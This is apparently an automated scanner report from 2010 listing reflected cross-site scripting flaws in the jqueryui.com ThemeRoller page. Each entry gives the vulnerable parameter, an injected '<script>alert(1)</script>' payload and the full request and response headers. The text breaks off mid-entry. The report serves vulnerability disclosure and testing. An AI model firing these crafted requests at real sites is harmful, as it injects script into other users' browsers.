This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee7afeb"><script>alert(1)</script>e6e1ca26fde&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44bcd"><script>alert(1)</script>001f9ca1294 was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada44bcd"><script>alert(1)</script>001f9ca1294&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddb02"><script>alert(1)</script>ab6c9905154 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaaddb02"><script>alert(1)</script>ab6c9905154&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6505"><script>alert(1)</script>5dfd401df80 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaab6505"><script>alert(1)</script>5dfd401df80&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:30:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f16e"><script>alert(1)</script>1d046989701 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=658f16e"><script>alert(1)</script>1d046989701&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 685ca"><script>alert(1)</script>81a7908cbb4 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75685ca"><script>alert(1)</script>81a7908cbb4&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae3f"><script>alert(1)</script>de2a08a5946 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75fae3f"><script>alert(1)</script>de2a08a5946&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36c84"><script>alert(1)</script>41681df22b was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9536c84"><script>alert(1)</script>41681df22b&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:54 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120064
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93e7f"><script>alert(1)</script>6bb1c029358 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=7593e7f"><script>alert(1)</script>6bb1c029358&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab27f"><script>alert(1)</script>a6e6f66d6d2 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55ab27f"><script>alert(1)</script>a6e6f66d6d2&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16ebb"><script>alert(1)</script>14f1893d8d7 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7516ebb"><script>alert(1)</script>14f1893d8d7&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bcf0"><script>alert(1)</script>b47e37778d5 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=04bcf0"><script>alert(1)</script>b47e37778d5&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:30:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2940e"><script>alert(1)</script>bb65b2d20eb was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=02940e"><script>alert(1)</script>bb65b2d20eb&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:30:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 230d2"><script>alert(1)</script>ddcbe0b8022 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
